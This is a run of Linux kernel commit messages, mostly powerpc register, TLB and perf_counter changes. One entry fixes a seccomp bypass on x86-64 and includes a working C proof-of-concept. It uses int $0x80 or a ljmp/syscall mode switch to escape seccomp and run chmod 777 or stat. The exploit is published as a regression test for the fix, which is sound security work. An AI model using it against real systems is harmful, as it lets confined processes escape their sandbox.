Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The powerpc 64 bit architecture defines three flags for the
DABR (Data Address Breakpoint Register). Add definitions
for the currently missing DABR_DATA_WRITE and DABR_DATA_READ
flags to the powerpc reg.h file.
Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Add macros for the GS (guest state) bit to the list of MSR bit definitions.
On PowerPC cores that support embedded hypervisor mode, GS is cleared if
the system is running in hypervisor state (and MSR[PR] is cleared), and set
if it's running in guest state. See the Power ISA 2.06 specification for
more information.
Signed-off-by: Timur Tabi <timur@freescale.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This adds the necessary bits and pieces to powerpc implementation of
ioremap to benefit from caller tracking in /proc/vmallocinfo, at least
for ioremap's done after mem init as the older ones aren't tracked.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The e500mc core supports the new tlbilx instructions that do core
local invalidates and also provide us the ability to take down
all TLB entries matching a given PID.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
This fixes three issues noticed by Arnd Bergmann:
- Add #ifdef __KERNEL__ and move some things around in perf_counter.h
to make sure only the bits that userspace needs are exported to
userspace.
- Use __u64, __s64, __u32 types in the structs exported to userspace
rather than u64, s64, u32.
- Make the sys_perf_counter_open syscall available to the SPUs on
Cell platforms.
And one issue that I noticed in looking at the code again:
- Wrap the perf_counter_open syscall with SYSCALL_DEFINE4 so we get
the proper handling of int arguments on ppc64 (and some other 64-bit
architectures).
Reported-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Paul Mackerras <paulus@samba.org>
Randomise ELF_ET_DYN_BASE, which is used when loading position independent
executables.
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>